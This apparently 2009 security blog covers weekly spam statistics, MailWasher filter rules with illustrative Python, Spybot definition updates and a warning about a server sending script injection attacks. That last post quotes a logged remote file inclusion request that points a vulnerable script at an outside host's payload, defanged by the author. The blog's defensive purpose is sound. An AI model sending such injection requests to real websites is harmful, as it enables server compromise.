Spam is still way down from last fall, thanks to the efforts of researchers in the security field. Starting with the takedown of the colocation facility McColo, on November 11, 2008, levels of incoming messages MailWasher identified as spam have dropped dramatically. That company provided hosting space and maintenance for privately owned servers that were used by spammers to command and control spam-sending Botnets. Those spammers are rebuilding or replacing their Botnets as I type this, so let's not become complacent. In fact, my spam count has been increasing at the rate of about 1% per week, since the third week of January, 2009.

If you use MailWasher Pro you can enable the Blacklist function and add pattern-matching blacklist entries that automatically delete spam messages whose forged From address matches either of these wildcard patterns: lin+met@+.de and kef+diz@+ (in MailWasher's blacklist notation the + stands for any run of characters, so these are wildcard patterns, not true regular expressions). These two blacklist rules caught 5% of this week's spam. This is way down from last week, when those two filters stopped 1/3 of all the incoming spam. Another Botnet must have gone offline.
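To show how wildcard blacklist entries of this kind behave, here is an added example in Python (written for this page; it is not the blog author's code and not MailWasher's own matcher). It assumes that MailWasher's + matches any run of characters, possibly empty, that every other character in the pattern is literal (so the dot in .de is a real dot), and that the comparison is case-insensitive and anchored to the whole address. The From: lines it runs over are constructed for the demonstration.

```python
import re
from email.utils import parseaddr

# The two patterns from the text, in MailWasher's wildcard notation.
BLACKLIST_PATTERNS = ["lin+met@+.de", "kef+diz@+"]

def wildcard_to_regex(pattern):
    """Compile a '+'-wildcard pattern into an anchored, case-insensitive regex.

    Assumption: '+' means "any characters, including none"; everything else is
    literal, so re.escape() protects dots and other regex metacharacters.
    """
    parts = [re.escape(p) for p in pattern.split("+")]
    return re.compile("^" + ".*".join(parts) + "$", re.IGNORECASE)

BLACKLIST = [(p, wildcard_to_regex(p)) for p in BLACKLIST_PATTERNS]

def blacklisted(from_header):
    """Return the pattern a From: header value matches, or None.

    The bare address is pulled out of display-name forms such as
    'Linda <linda.met@host.de>' first, so a friendly name cannot hide a
    forged address from the match.
    """
    _, addr = parseaddr(from_header)
    for pattern, regex in BLACKLIST:
        if regex.match(addr):
            return pattern
    return None

# Constructed From: header values in the style of the forged senders described above.
SAMPLE_FROMS = [
    "Linda <linda.met@mail-host.de>",      # lin...met@...de  -> blacklisted
    "kefir.diz@cheapmeds.example",         # kef...diz@...    -> blacklisted
    "Kef Diz <KEFDIZ@anything.example>",   # case-insensitive -> blacklisted
    "alice@example.com",                   # no match
    "support@linmet.de",                   # 'lin' not at the start -> no match
]

if __name__ == "__main__":
    for line in SAMPLE_FROMS:
        print(f"{line:40} -> {blacklisted(line)}")
```

The last sample is the one to notice: because the pattern is anchored, lin+met@+.de only catches addresses that begin with "lin", which is what keeps a rule this short from eating legitimate mail from a domain that merely contains those letters.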

MailWasher Pro spam category breakdown for Feb 9 - 15, 2009. Spam amounted to only 10% of my incoming email this week.


Viagra spam: 25.00%
Hidden ISO Subject: 25.00%
HTML Tricks: (ex: vertical, colored, or right-aligned spam words) 10.00%
Male enhancement spam (subject or body): 10.00%
Known Spam Subjects (by my filters): 5.00%
Nigerian 419 Scams: 5.00%
Blacklisted Domains/Senders: (by pattern matching wildcard rules like: lin+met@+.de and kef+diz@+) 5.00%
Fake "Canadian Pharmacy" spam (fake Viagra, Cialis, etc): 5.00%
Misc. Pharmaceutical spam (inc. Viagra, Cialis, Levitra & misc. pills & herbals): 5.00%
Dating scams: 5.00%

If you are reading this and wondering what you can do to reduce the sometimes huge volumes of spam emails that must be overwhelming your POP client inboxes, I recommend MailWasher Pro (with my downloadable custom filters) as an incoming email screener for your POP email program (Microsoft Outlook, Microsoft Outlook Express, Microsoft Live Mail, Eudora, Mozilla and other stand-alone email programs).

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters or, if they made it through, were reported to SpamCop, of which I am a reporting member, and manually deleted. I never buy anything that is Spamvertised and recommend you don't either! Remember, almost all spam is now sent from compromised home or business PCs, zombies in various Botnets, all of which are controlled by criminals. If you purchase anything advertised in spam messages, you have given your credit or debit card information to the criminals behind that enterprise. If you are really lucky you will only be charged for the fake items you purchased, but, if not, you might find your credit limit used up, or your bank account emptied (for debit card transactions), by cyber criminals.

Also, unsubscribing through links in botnet-sent spam messages is futile, as you never opted in in the first place; your email address was captured by an email harvester on an infected computer belonging to somebody you corresponded with. Instead of receiving less spam, as one might expect from unsubscribing, all it does is confirm that your email address is active, and you will see even more spam than before.

Another common way your email address may get harvested by spammers is if it appears in a large C.C. (Carbon Copy) list on a computer that is recruited into a Botnet. Many people engage in forwarding messages among all their friends. Each time they forward chain letters their address gets added to the growing list of recipients (called Carbon Copy, or CC). If just one recipient of that message has an email-harvesting malware infection, all of the email addresses listed in that message will be sent home to the spammer behind that spam run.

Smart folks who want to forward or send a message to multiple recipients use B.C.C. instead of C.C. Using B.C.C. hides all of the recipients from displaying. The To field will just show "Undisclosed Recipients" in a message sent using B.C.C. This is safest for you and your friends or mailing list. All email clients have a means of displaying a B.C.C. field.
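An added example in Python (written for this page, not the blog author's code) that shows why this matters. It builds the same forwarded note twice, once with the friends in Cc: and once in Bcc:, hands each to a stand-in for the mail client's submission step (which strips the Bcc: header the way smtplib's send_message does), and then runs the kind of address-scraping regular expression a harvester uses over the bytes that would land in every recipient's mailbox. All addresses are constructed.

```python
import re
from email.message import EmailMessage

# Constructed addresses standing in for the sender and the friends on a chain letter.
SENDER = "me@example.com"
FRIENDS = ["ann@example.org", "bob@example.net", "cat@example.edu"]

# A deliberately simple harvester pattern: what address-scraping malware on any
# recipient's PC would pull out of a message sitting in the inbox.
ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def build_message(visible_copies):
    """The same forwarded note, with the friends in Cc: (True) or Bcc: (False)."""
    msg = EmailMessage()
    msg["From"] = SENDER
    msg["Subject"] = "Fwd: you have to read this!"
    if visible_copies:
        msg["To"] = FRIENDS[0]
        msg["Cc"] = ", ".join(FRIENDS[1:])
    else:
        msg["To"] = "undisclosed-recipients:;"   # an empty address group: nobody is exposed
        msg["Bcc"] = ", ".join(FRIENDS)
    msg.set_content("Forwarding this to everyone I know.")
    return msg

def hand_to_mta(msg):
    """Stand-in for the mail client's submission step.

    Envelope recipients are collected from To:, Cc: and Bcc:; the Bcc: header is
    then stripped before the bytes go out, as smtplib.SMTP.send_message does, so
    Bcc: addresses never appear in anyone's delivered copy.
    """
    recipients = []
    for field in ("To", "Cc", "Bcc"):
        if msg[field] is not None:
            recipients.extend(ADDR_RE.findall(str(msg[field])))
    del msg["Bcc"]
    return recipients, msg.as_bytes()

def harvest(wire_bytes):
    """Every address a scraper can read out of the delivered message."""
    return sorted(set(ADDR_RE.findall(wire_bytes.decode("ascii", "replace"))))

def simulate(visible_copies):
    """Build, submit and scrape one message.

    Returns (number of people it was delivered to, addresses harvestable from
    a delivered copy, whether a Bcc: header leaked into that copy).
    """
    envelope, wire = hand_to_mta(build_message(visible_copies))
    return len(envelope), harvest(wire), b"Bcc:" in wire

if __name__ == "__main__":
    for label, visible in (("Cc", True), ("Bcc", False)):
        delivered, leaked, bcc_leaked = simulate(visible)
        print(f"{label}: delivered to {delivered}, harvestable: {leaked}, Bcc leaked: {bcc_leaked}")
```

Both messages reach all three friends, but the Cc: version hands a harvester four addresses while the Bcc: version hands it only the sender's.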

February 11, 2009

Return of the Botnets- Spam is on the rise again

After three months of reduced spam volumes I am now seeing a sudden resurgence, especially in the form of the fake Canadian Pharmacy, unapproved Asian made Viagra and various male enhancement pills, strips and patches. All of this spam, like all spam from the year before, is sent via compromised Windows computers which have been unknowingly recruited in spam Botnets. These Botnets are commanded and controlled by criminals in Eastern Europe (in the former Soviet Union) and other places where authorities tend to turn a blind eye to cyber criminal activities.

It is difficult to know which Botnet is sending out this new round of pharmacy spam without capturing a Bot, logging its actions and reading its spam templates, but this has all the earmarks of the Mega-D Botnet (speculation). Mega-D, otherwise known as Ozdok, was one of the most prolific Botnets still running after the takedown of the McColo Corp. command and control servers on November 11, 2008. The majority of the colocation servers in that facility were used for illegal activities, including command and control of several Botnets. Mega-D was the first to re-emerge and resume spamming and is very likely responsible for the current resurgence I saw yesterday and today. If not, it is a similar Botnet being rented out to spammers (the Bot Masters usually rent portions of their Botnets to spammers, rather than doing any spamming themselves).

I didn't write my usual Sunday spam report this week, because the amount of spam for the week of February 2 - 8, 2009 was ridiculously low (around 7%) and only encompassed four categories, as defined by my MailWasher Pro custom filter rules. Still, a pattern was developing and I can now report on it. Maybe this will help others in identifying the Botnet behind this recent spam run. Most of the spam coming in from February 8 through 11 is identified by my "Hidden ISO or ASCII Subject" filter, which looks for Subject headers written as RFC 2047 "encoded-words" (the =?ISO-8859-1?B?...?= form, which names a character set and a Base64 or quoted-printable encoding so that the receiving mail client can display the text). Emails sent to English-speaking North American inboxes have no need of that encoding, as long as the Subjects are typed in plain English. However, messages composed in Europe or Asia by non-English speakers may need it to be readable at their destinations, and the spammers can set the declared character set to display the spam subject in the language of the targeted country. This is what has been going on since the Mega-D Botnet re-emerged in late November, 2008.

Those of you who use MailWasher Pro to filter out spam and aren't already using my custom filters can apply the following filter to detect and either flag or auto-delete any spam containing a hidden ISO subject. The following rule must occupy one long line and goes into your filters.txt file, located in your logged-in identity's %AppData%\MailWasherPro folder. Note that you must close MailWasher before editing filters.txt, save the changes, then reopen the program.

[enabled],"Hidden ISO Subject","Hidden ISO or Ascii Subject",16711680,OR,Delete,Automatic,EntireHeader,containsRE,^Subject:[^\n]*?=\?ISO-8859-[^\n]*?\n,EntireHeader,contains,"Subject: =?us-ascii?",EntireHeader,contains,"Subject: =?windows-1251?B?",EntireHeader,contains,"Subject: =?gb2312?B?"

If you don't trust the accuracy of my filter, remove the word Automatic from the rule. The rule will then only flag messages matching the Hidden ISO rule as spam, with a checkmark in the Delete column in MailWasher Pro, instead of deleting them automatically. (In the regular-expression part of the rule the question mark after the equals sign is escaped as =\? on purpose: an unescaped =? would mean "an optional equals sign" rather than the literal =? that opens an encoded-word.)
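The following Python is an added example (written for this page; it is not the blog author's code and not part of MailWasher) that reimplements the four conditions of the filter above and also decodes the subject, so you can see what the recipient would have read. The sample header blocks are constructed with a small helper rather than captured from real mail. One assumption: the script matches case-insensitively, which the page does not state for MailWasher, but charset names in encoded-words are case-insensitive, so this is the safer reading.

```python
import base64
import re
from email.header import decode_header

# The four conditions of the MailWasher rule above, in the same order. The '?'
# after '=' is escaped because in a regular expression a bare '=?' means an
# optional '='. Assumption: matching is case-insensitive.
ISO_RULE = re.compile(r"^Subject:[^\n]*?=\?ISO-8859-[^\n]*?\n", re.IGNORECASE | re.MULTILINE)
LITERAL_RULES = ("Subject: =?us-ascii?", "Subject: =?windows-1251?B?", "Subject: =?gb2312?B?")

def hidden_iso_subject(raw_headers):
    """True when a raw header block would trip the 'Hidden ISO Subject' rule."""
    if ISO_RULE.search(raw_headers):
        return True
    lowered = raw_headers.lower()
    return any(lit.lower() in lowered for lit in LITERAL_RULES)

def subject_of(raw_headers):
    """Decode the Subject: the way a mail client displays it (RFC 2047 encoded-words)."""
    m = re.search(r"^Subject:[ \t]*(.*)$", raw_headers, re.MULTILINE)
    if not m:
        return ""
    text = []
    for chunk, charset in decode_header(m.group(1)):
        if isinstance(chunk, bytes):
            chunk = chunk.decode(charset or "ascii", errors="replace")
        text.append(chunk)
    return "".join(text)

def encoded_word(charset, text):
    """Build one Base64 ('B') encoded-word; used only to construct the samples below."""
    payload = base64.b64encode(text.encode(charset)).decode("ascii")
    return f"=?{charset}?B?{payload}?="

# Constructed header blocks, not captured mail. Each ends with the newline the rule expects.
SAMPLES = {
    "iso_pharma": "From: x@example.net\nSubject: " + encoded_word("ISO-8859-1", "Cheap meds for you") + "\n",
    "gb2312":     "From: y@example.net\nSubject: " + encoded_word("gb2312", "Special offer") + "\n",
    "us_ascii":   "From: z@example.net\nSubject: " + encoded_word("us-ascii", "hello") + "\n",
    "plain":      "From: z@example.org\nSubject: Meeting tomorrow\n",
    "utf8_legit": "From: w@example.org\nSubject: " + encoded_word("UTF-8", "Re: Café order") + "\n",
}

if __name__ == "__main__":
    for name, hdrs in SAMPLES.items():
        print(f"{name:11} flagged={hidden_iso_subject(hdrs)!s:5} subject={subject_of(hdrs)!r}")
```

Note what the last sample shows: a UTF-8 encoded-word, which is what a modern client produces for any non-ASCII subject, is not one of the four conditions and passes the rule untouched. The rule is narrower than "any encoded subject", which is why it has held up without a flood of false positives.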

If you are reading this on a Windows computer you need anti-malware protection that operates as a "resident service" and monitors every file opened, saved, run or downloaded, plus scans websites you try to visit for infected or hostile scripts or forced downloads. This will protect you against Bot infections, as long as the security program is updated regularly (daily is just barely acceptable anymore). I personally recommend Trend Micro Internet Security (PC-cillin and Pro versions) to perform these tasks. PC-cillin is updated with new malware and infected website information constantly, using "in-the-cloud" technology. Every Trend Micro paying subscriber is automatically protected as soon as a definition is sent to the "cloud" servers. Instead of loading down your computer with huge definition files, the largest portion of the updates occurs in the cloud, and your PC is in contact with that secure cloud server all the time you are online. Of course, you still get some updates downloaded to your PC, but not so many as to cause it to grind to a halt!

If you can't afford this kind of realtime, in-the-cloud protection, but must rely upon free anti-virus and anti-spyware applications, at least install Trend Micro's free utility called RUBotted. RUBotted will notify you if it detects Bot-like activity, or finds a known Bot in a quick scan. You would then be instructed to click on the link to scan your computer with the free Trend Micro Online HouseCall scanner to remove the threat. This is a lot of user interaction, but hey, it's free!

Norton offers a more advanced tool that is similar to RUBotted, known as Norton Antibot. AntiBot costs $29.99 US per year for a subscription to updates and allows you to install it onto three PCs at no additional cost. It uses Active Behavioral-Based Analysis that stops and removes malicious bots before they can cause damage, turn you into a spammer, or steal personal information.

One note of good news for owners of Srizbi Bot infected PCs: Microsoft updated the Malicious Software Removal Tool (MSRT) on Patch Tuesday, February 10, 2009, to detect and remove the Srizbi Bot infection.

Spybot Search and Destroy Definitions Updated on 2/11/2009

If you are using "Spybot Search and Destroy" to protect your PC against spyware infections and haven't updated it this week, be aware that updates to the definition files were released on schedule, on Wednesday this week, as listed below. Spyware and other classes of malicious programs are altered constantly to avoid detection by anti-spyware programs. Since Spybot S&D updates are only released on a weekly schedule (on Wednesdays) it is imperative that you make it a point to check for and download updates every week, preferably on Wednesday evenings. After downloading all available updates (from the best responding download server in the list of server locations), immunize*, then scan for and remove any detected malware. If Spybot is unable to remove an active threat it will ask for permission to run before Windows starts during the next reboot. Spybot will then run a complete scan before your Windows desktop loads, removing malware that has not yet loaded into memory.

If you arrived here by searching for the name of some malware that may be on your computer and you are not currently using Spybot Search and Destroy, you can download the latest version from the Spybot Search and Destroy Multi-Lingual Landing Page. Choose your language, then use the link in the left sidebar to go to the downloads page. Download the program from your closest mirror server, install it, update it (Updates button), then follow the instructions below to detect and remove any malware that is on your PC.

If you see a program listed in the detections below, by name, you should assume that it is malware (with the possible exception of the PUP group, which is up to user discretion). All of the programs listed with a single + sign are updated detections, while a double ++ in front of a name indicates a brand new detection. A number in parentheses, following a malware name, indicates the number of variants included in that detection. These programs are dangerous to your computer, and/or personal security or privacy.

* After updating your Spybot S&D definitions, if they include new "immunization" definitions you need to click on the "Immunize" button, then, if the status line tells you that additional immunizations are possible, click on the Immunize link, near the top of the program. It has a green + sign in a button. If you don't do this the new immunizations against hostile ActiveX programs will not be applied. After immunizing with any new detections, run a scan for malware by clicking on the "Spybot Search & Destroy" button, on the left panel, then on the button with the magnifying glass icon, labeled: "Check For Problems."

Spybot Updates - published every Wednesday

Spybot Search and Destroy 1.6.2 was just released on January 26, 2009. This is probably going to be the last "maintenance release" before version 2.0 is released. It scans for threats about 4 times faster than previous versions and has a redesigned spyware removal engine. Upgrade now to Spybot S&D 1.6.2. The newest Virtumonde and Zlob threats require the anti-malware engine in Spybot 1.6+ to be removed effectively.

Work is progressing rapidly on the upcoming version 2.0, of Spybot Search and Destroy. A preview of Spybot 2.0 will also be available as soon as servers have adjusted to the additional 1.6.2 release load. Version updates are discussed in my extended comments.

Additions made on February 11, 2009:

Hijackers
+ MyPoints

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ RapidAntivirus
+ Smitfraud-C.
+ Win32.TDSS.rtk
+ WinSpywareProtect
+ XPPoliceAntivirus

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ Live-Player
+ MyWay.MyWebSearch

Security
+ Microsoft.Windows.AppFirewallBypass

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ KillAV
+ Speedrunner
+ Virtumonde
+ Virtumonde.sci
+ Virtumonde.sdn
+ Webshow
+ Win32.Agent.aiae
+ Win32.Agent.bakf
+ Win32.Agent.fbx
+ Win32.Bagle.av
+ Win32.Clicker.vp
+ Win32.Rbot.fx
+ Win32.Renos.ik
+ Zlob.Downloader.miu
+ Zlob.Downloader.ned
+ Zlob.Downloader.pit

Total: 1332704 fingerprints in 381260 rules for 4550 products.

The domain "Spywareinfo.com" was recently added to the HOSTS file updates (for redirection to 127.0.0.1), because the domain name expired and was purchased by spammers or malware distributors in December 2008. It now advertises a fake Spybot Search & Destroy, fake security scans and various malware downloads. The new Spywareinfo malware removal forum is located at: http://www.spywareinfoforum.com/

In case you have noticed a slowdown in the scan times over the past few months, it's because the number of detection patterns used to detect malware has doubled since the release of Spybot S&D v1.6, in July 2008. Older versions of Spybot are no longer being updated and cannot deal with many of the new malware definitions and removal routines.

False positive detections reported or fixed this week:

A confirmed false positive was reported and fixed this week regarding the blocked domain myvnc.com. It was removed from the Restricted Sites Zone on Feb 11, 2009, in the optional "F/P" update.

A HOSTS file DNS block on the domain redtube.com was removed on September 17, 2008, but some users have not re-immunized their Spybot databases and that website is still blocked for them. Update your definitions, including new "immunizations," then use the "Immunize" button to apply the changes. Immunizing both adds and removes entries, as new threats are discovered or old threats are resolved (bad sites sometimes turn into good sites, or remove questionable downloads or links to malware).

Friendly advice:
Stop using Heuristics scans for now. There are too many false positives with this type of scan. You can rely upon the definitions scans a lot more than Heuristics.

"The default scan with Spybot S&D is more accurate and recommended over the single file scanner. Especially the heuristics part of the single file scanner is prone to false positives."

If you wish to report or discuss a possible false positive detection by Spybot S&D, please read this first.

Extended Comments


Virtumonde (also known as the Vundo Trojan) is a Trojan horse that is known to cause pop-ups and advertising for rogue anti-spyware programs. It also causes other problems, including performance degradation and denial of service with some websites, including Google. It hooks itself into the operating system by registering its DLLs as phony Browser Helper Objects (BHOs) in Internet Explorer and as Winlogon notification packages, so they are loaded by the Winlogon process and Windows Explorer and are already in memory when a normal scan runs, which is why removal often has to happen before the desktop loads.

Work is progressing at a steady pace on Spybot S&D version 2.0, thanks to an army of volunteer beta testers. The upcoming version will be modularized, with separate executables carrying out different detection and immunization tasks now performed by the main program file. This is expected to speed up the scanning times, which is becoming more strenuous with the rapid increase in the number of detections being developed by Team Spybot.

To benefit from these improvements, I recommend that you update to Spybot Search & Destroy 1.6.2, which is available through the update function integrated into the application as well as from the Spybot S&D download page. When version 2.0 is finally released you should follow the to-be-posted instructions and upgrade to that version.


February 4, 2009

Spybot Search and Destroy Definitions Updated on 2/4/2009


Spybot Updates - published every Wednesday

Additions made on February 4, 2009:

Keyloggers
+ PerfectKeylogger

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ Banload
+ CMVideo
+ MalwareBot
+ RegSweep
+ Smitfraud-C.gp
+ TotalProtect2009
+ Win32.AutoRun.ey

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ Go-Astro

Security
+ Microsoft.Windows.AppFirewallBypass

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ NeoControlRed
+ Virtumonde.sci
+ Virtumonde.sdn
+ Win32.Agent.bhcs
+ Win32.Agent.fbx
+ Win32.Bitar.a
+ Win32.ControlTotal.l
+ Win32.FraudLoad.cxj
+ Win32.Tibia.ci
+ Zlob.DNSChanger.Rtk
+ Zlob.Downloader.bit
+ Zlob.Downloader.ger

Total: 1317330 fingerprints in 376606 rules for 4544 products.

The domain "Spywareinfo.com" was recently added to the HOSTS file updates (for redirection to 127.0.0.1), because the domain name expired and was purchased by spammers or malware distributors in December 2008. It is now advertising a fake Spybot Search & Destroy, fake security scans and various malware downloads. The new Spywareinfo malware removal forum is located at: http://www.spywareinfoforum.com/

In case you have noticed a slowdown in the scan times over the past few months, it's because the number of detection patterns used to detect malware has doubled since the release of Spybot S&D v1.6, in July 2008. Older versions of Spybot are no longer being updated and cannot deal with many of the new malware definitions and removal routines.

False positive detections reported or fixed this week:

Confirmed False heuristics hit on Symantec file nppbho.dll showing virtumonde. Fixed with today's updates.

Confirmed F/P Virtumonde.SCI detected on NAV Helper BHO. Fixed with today's updates.

Brontok.Ab in a Windows desktop ini file is under investigation right now, but is probably a F/P.

Stop using Heuristics scans for now. There are too many false positives with this type of scan. You can rely upon the definitions scans a lot more than Heuristics.

"The default scan with Spybot S&D is more accurate and recommended over the single file scanner. Especially the heuristics part of the single file scanner is prone to false positives."

If you wish to report or discuss a possible false positive detection by Spybot S&D, please read this first.

Extended Comments

Malware Removal Guides

The good folks at Spybot S&D have started a new segment of their official forums, titled "Malware Removal Guides." Each week they intend to write a short self-help article to help you remove various common malware threats manually, or in conjunction with Spybot S&D. This should prove to be a very useful addition to the Spybot forums.

If you are still using Spybot S&D 1.3, or 1.4, update support is about to end and your computer will be at greater risk because of having outdated definitions. Furthermore, older versions of Spybot are known to report lots of false positives, due to the advanced heuristic rules now found in the newer definition files.

If you are using any version older than 1.6 please upgrade to the current version of Spybot S&D, which is now 1.6.2, as soon as possible. New definitions for malware like the Virtumonde family of Trojans need the newer processing technologies introduced in version 1.6.0. Also, the number of malware definitions has more than doubled between July and December, 2008.

Virtumonde (also known as the Vundo Trojan) is a Trojan horse that is known to cause pop-ups and advertising for rogue anti-spyware programs. It also causes other problems, including performance degradation and denial of service with some websites including Google. It attaches itself to the operating system using phony Browser Helper Objects (BHOs) and .dll files attached to the Winlogon process and Windows Explorer.

Work is progressing at a steady pace on Spybot S&D version 2.0, thanks to an army of volunteer beta testers. The upcoming version will be modularized, with separate executables carrying out the detection and immunization tasks now performed by the main program file. This is expected to speed up the scanning times, which are getting longer with the rapid increase in the number of detections being developed by Team Spybot.

To benefit from these improvements, I recommend that you update to Spybot Search & Destroy 1.6.2, which is available through the update function integrated into the application as well as from the Spybot S&D download page. When version 2.0 is finally released you should follow the to-be-posted instructions and upgrade to that version.

If your computer gets stuck in a logon/logoff loop, after updating and scanning with the older versions of Spybot, visit this forum page for a solution, from Team Spybot.

Of continued concern to people who operate as Limited or Power Users for their daily browsing and email, Spybot Search and Destroy is still corrupting your less privileged accounts after you update it, immunize and scan from an Administrator level account. If, after doing these things, you log off the Administrator account and try to log into your Limited/Power User account, it may be corrupted and a generic desktop and start menu may appear. Don't panic! Your account and desktop can be restored by simply rebooting the computer. When you login after the reboot your previous settings will reappear. I don't know why this happens, but, stuff happens! It may be related to the relatively new rootkit detection added last year.

If you want to get direct assistance from Team Spybot, or their talented volunteers, visit the Spybot support forums, sign up for a user account and post your request for assistance. Be sure to read the rules before posting a question or reply.

If your computer is infected and you need help removing the threats, go to the Malware Removal Forums, at Safer Networking/Spybot.info. Again, read the rules before posting your request or logs! Do NOT inject your problem into somebody else's thread! Start a new topic.

Some people are confused by detections of Wild Tangent on their computers. Wild Tangent is detected as a PUP, meaning Potentially Unwanted Program, because it does send home some identifiable information about you and your computer. It ships with various games and screen savers and is a means of funding those programs. If you knowingly installed Wild Tangent and aren't worried about it, and don't wish to have Spybot repeatedly display it in scan results, do the following: Right click the WildTangent Product in the Scan result and select to "Ignore the product from further searches."

If Spybot flags a file on your computer that you believe is a false positive detection, use caution and check with the Spybot False Positives Forum before allowing it to be deleted. You can submit a report to the Spybot False Positives forum, after signing up for an account and reading about how to report false positives before submitting your report and request for analysis.



February 2, 2009

My Spam analysis for Jan 19 - Feb 1, 2009

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

Wow! Spam is down for another week, thanks to the efforts of some of our colleagues in the security field. Starting with the takedown of the colocation facility McColo, on November 11, 2008, levels of incoming messages MailWasher identified as spam have dropped dramatically. That company provided hosting space and maintenance for privately owned servers that were used by spammers to command and control spam-sending Botnets. Those spammers are rebuilding or replacing their Botnets as I type this, so let's not become complacent. In fact, I suspect that a huge new Botnet is currently being assembled, via the Conficker/Downadup Worm. More about this emerging threat will be in a forthcoming article.

Once again, with the main command and control servers being partially or fully offline, I urge all Windows computer owners and sys admins to install security applications that are capable of detecting SpamBot activity. Please do yourself a favor and protect your PCs against Bots with Norton AntiBot, or Trend Micro's free program called RUBotted.

Some of the top rated Internet security products now contain Bot detection and prevention components. These include the Symantec and Trend Micro Internet Security Suites. I wrote a blog article about detecting and removing Bots in December, 2008. You can also visit Microsoft's download center and grab a current copy of the Malicious Software Removal Tool and let it scan your computer for malware and Bots. It will remove any threats listed in the tool's database, which now include the widespread Conficker/Downadup Worm. Microsoft has been at war with Botnets since September 2007 (when they took down much of the Storm Botnet) and has made a huge dent in their numbers. This tool is totally free and is updated once a month. It is regularly released on Patch Tuesdays.

Note that I have re-enabled my pattern matching blacklist filters in MailWasher Pro to automatically delete spam messages containing a forged From address matching either of these patterns: lin+met@+.de and kef+diz@+. These two blacklist rules alone caught 33% of this week's spam!

MailWasher Pro spam category breakdown for Jan 19 - Feb 1, 2009. Spam amounted to a measly 9% of my incoming email this week.


Blacklisted Domains/Senders: (by pattern matching wildcard rules like: lin+met@+.de and kef+diz@+) 33.33%!
Pills spam: 16.67%
HGH spam: 8.33%
Fake "Canadian Pharmacy" spam (fake Viagra, Cialis, etc): 8.33%
Subject All Capitals or No Subject: (Nigerian 419 and Lottery scams) 8.33%
Hidden ISO Subject: 8.33%
Nigerian 419 Scams: 8.33%
Blocked Countries, RIPE, LACNIC, APNIC: 8.33%

If you are reading this and wondering what you can do to reduce the huge volumes of spam emails that must be overwhelming your POP client inboxes, I recommend MailWasher Pro (with my downloadable custom filters) as an incoming email screener for your POP email program (Microsoft Outlook, Microsoft Outlook Express, Microsoft Live Mail, Eudora, Mozilla and other stand-alone email programs).

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or, if they made it through, were reported to SpamCop, of which I am a reporting member, and manually deleted. I never buy anything that is Spamvertised and recommend you don't either! Remember, almost all spam is now sent from compromised home or business PCs, zombies in various Botnets, all of which are controlled by criminals. If you purchase anything advertised in spam messages, you have given your credit or debit card information to the criminals behind that enterprise. If you are really lucky you will only be charged for the fake items you purchased, but, if not, you might find your credit limit used up, or your bank account emptied (for debit card transactions), by cyber criminals.

Also, unsubscribing through links in botnet-sent spam messages is futile, as you never opted-in, in the first place; your email address was captured by an email harvester on an infected computer belonging to somebody you corresponded with. Instead of receiving less spam as one might expect (by unsubscribing), all it does is confirm that your email address is active and you will see even more spam than before.

Another common way your email address may get harvested by spammers is if it appears in a large C.C. (Carbon Copy) list on a computer that gets Botnetted. Many people engage in forwarding messages among all their friends. Each time they forward chain letters their address gets added to the growing list of recipients (called Carbon Copy, or CC). If just one recipient of that message has an email harvesting malware infection, all of the email addresses listed in that message will be sent home to the spammer behind that spam run.

Smart folks who want to forward or send a message to multiple recipients use B.C.C. instead of C.C. Using B.C.C. hides all of the recipients from displaying. The To field will just show "Undisclosed Recipients" in a message sent using B.C.C. This is safest for you and your friends or mailing list. All email clients have a means of displaying a B.C.C. field.



February 1, 2009

Block server script injection exploits targeting your websites

Server exploits abound!

Enough is enough already! It's bad enough that I have to fend off the occasional exploit attempt against my main website, but 24 in one day, from the same IP address is something I can't ignore, and neither should anybody else who maintains a website. That IP address is 212.241.182.240, which is a dedicated server that belongs to Pipex Dedicated Hosting (and associates), in Great Britain (See Whois report). This is an exploited server and it is hostile to other servers and websites!

Here is a sample of just one of the many attacks launched by this server, against mine (I deactivated the hyperlink to the hostile script, substituting an * for a t):

212.241.182.240 - - [01/Feb/2009:02:44:23 -0800] "GET /?sIncPath=ht*p://kadin.or.id/mail/id1.txt?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

What's this all about, you ask? It's about somebody who is leasing a dedicated server and either knowingly or unknowingly using it to blast out hostile exploitation scripts against other servers. This exploit is trying to upload a file named id1.txt into my website, via some vulnerability in a script that might be running on it (didn't happen - see the 403 response). Normally I wouldn't even assume that the people leasing the server had any knowledge of such goings on, but this time something is different. In just about every other instance of script injection attempts, when I trace the IP to a server and try to access it, I usually see one of the following responses:

  1. A website's home page (index.html, index.php, etc.)
  2. A "Welcome to Apache" screen, for a new website on an Apache server
  3. A Welcome to cPanel or WHM screen
  4. A welcome screen for an unconfigured website hosted on a Windows IIS server
  5. A 403 Forbidden message (someone doesn't want me poking around)
  6. A message that no website has yet been configured on the server

Today, when I went to investigate the IP address that was spewing out 24 exploit attempts in one day, instead of one of the above listed typical responses, all I saw was a login field, requesting a user name and password. This is a password protected website and it is being used to exploit other websites and web servers. Nobody can access any of its pages, or inject hostile scripts into it, without logging in with the correct credentials. Maybe this server used a weak password and user name combination that was cracked with a dictionary or rainbow attack, or maybe the administrator was tricked into allowing a keylogger to infect his or her personal computer (used to login to his/her website), or maybe the owner is knowingly using this server to launch exploit attacks against other servers, like mine.

Whatever the case may be, this server is out to get us and if you run a website you may want to block it for your website's protection. I will give you several methods of denying access to this server and others launching similar exploits, in my extended comments.

How to block exploit injection attacks targeting your websites.

